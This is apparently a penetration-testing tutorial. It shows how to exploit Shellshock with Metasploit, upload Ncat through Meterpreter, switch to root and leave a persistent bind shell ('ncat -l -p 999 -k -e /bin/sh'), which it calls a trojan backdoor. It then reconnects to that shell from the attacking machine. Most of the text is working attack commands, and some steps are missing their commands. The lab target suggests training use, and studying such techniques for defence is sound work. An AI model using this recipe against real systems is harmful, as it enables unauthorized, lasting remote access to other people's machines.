Ncat has been used as a Telnet replacement up until now. Instead of using Ncat to connect to other computers, we can also set up Ncat to listen mode. Listen mode allows us to install Ncat on a compromised machine, run it on any port of our choosing, and then connect to it with another copy of Ncat on our attacking computer. We can start Ncat in listen mode and then bind the bash shell to it, allowing us to pass commands to the target host. Also, we can freely disconnect and reconnect to the listening Ncat on the target system. So let's take a look without any further delay that how we can use Ncat as a trojan.
Step 1: Copying Ncat
First, let's copy the Ncat binary to our home folder:
cp /usr/bin/ncat ~
Step 2: Staring Metasploit Framework
Now we will compromise our target the same way we did in earlier posts: by exploiting the Shellshock vulnerability with Metasploit Framework.
Start the Metasploit Framework:
Step 3: Selecting Exploit Module
Select the Shellshock exploit module:
Step 4: Selecting Payload
As you may remember from earlier posts, Meterpreter, one of the most powerful Metasploit payloads, has an easy file upload feature. So let's use Meterpreter to transfer Ncat to our target. Select Meterpeter payload as follows:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Step 6: Setting Options: RHOST, TARGETURI, LHOST
Now start configuring the exploit options. Again, RHOST is our target (remote), host:
set RHOST skillsetlocal.com
The TARGETURI value points to the vulnerable script on the target system:
set TARGETURI /cgi-bin/vulnscript.sh
Finally, LHOST is the local IP that Meterpreter will connect back to:
set LHOST 127.0.0.1
Step 5: Running Exploit
Let's run the exploit.
You should get a Meterpreter shell prompt.
Step 6: Uploading Ncat
Now we will transfer Ncat to the target with the Meterpreter's upload command:
Step 7: Getting a Shell
Now we need to start Ncat in listen mode. First, open a command shell from Meterpreter:
Step 8: Switching to root
We will need elevated privileges to run Ncat. Let's assumed that we already obtained the root password for the target (using one of the techniques we covered in other posts). Enter the following command to switch to root:
Enter password123 when prompted.
Now we can start Ncat.
Step 9: Starting Ncat Listener
The command below will start Ncat in listen mode. The -k option forces it to stay in listening mode even when a client disconnects (this is an important option). The -p option selects the port and the -e binds the command shell to the selected port.
ncat -l -p 999 -k -e /bin/sh
We are done here. Our Trojan backdoor is set up, and now we can get access to the target system whenever we want. Hit Crtl+C and enter y to return to the prompt. Enter exit twice to close the Metasploit Framework.
Step 10: Connecting to Listener
Let's see if we can connect to the listener. Enter the following command:
ncat skillsetlocal.com 999
You have command line access to the target. Try entering an OS command to verify (you won't see any kind of prompt, just enter the command in the new line):
whoami Neat. You can try disconnecting (press Ctrl+C) and re-connecting (re-enter the Ncat command). The connection stays open.
Also read: Post-Exploit Password Cracking